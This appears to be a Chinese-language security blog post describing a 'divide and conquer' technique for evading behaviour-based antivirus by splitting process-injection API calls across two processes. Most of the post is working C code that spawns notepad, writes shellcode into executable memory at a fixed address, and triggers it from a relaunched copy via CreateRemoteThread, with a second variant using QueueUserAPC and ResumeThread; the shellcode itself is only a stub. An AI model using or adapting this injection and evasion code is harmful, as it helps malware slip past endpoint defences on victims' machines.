idiotc4t's blog
搜索文档…
Divide and Conquer

简介

看到了一种比较有意思的手法,现在的杀软会关注函数的执行链, theevilbit公开了一种通过不同进程分离执行API,绕过基于行为的AV检测。
常见的行为检测会有监控堆栈的调用链和hookapi记录行为,这种分离执行方式都能绕过。

流程

  1. 1.
    创建傀儡进程
  2. 2.
    向傀儡进程写入payload
  3. 3.
    创建同文件进程传入pid
  4. 4.
    通过pid打开傀儡句柄
  5. 5.
    创建远程线程

代码

#include <stdio.h>
#include <windows.h>
unsigned char shellcode[] =
"\xfc78\x00";
int main(int argc, char* argv[]) {
if (argv[1]==NULL)
{
STARTUPINFOA si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = { 0 };
CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
char cmd[MAX_PATH] = {0};
wsprintfA(cmd, "%s %d", argv[0], pi.dwProcessId);
CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
}
else
{
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1]));
CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)0x0000480000000000, 0, 0, 0);
}
return 0;
}

同理

if (argv[1]==NULL)
{
STARTUPINFOA si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = { 0 };
CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
char cmd[MAX_PATH] = {0};
wsprintfA(cmd, "%s %d", argv[0], pi.dwThreadId);
QueueUserAPC((PAPCFUNC)0x0000480000000000, pi.hThread, NULL);
CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
}
else
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, NULL, atoi(argv[1]));
ResumeThread(hThread);
}

LINK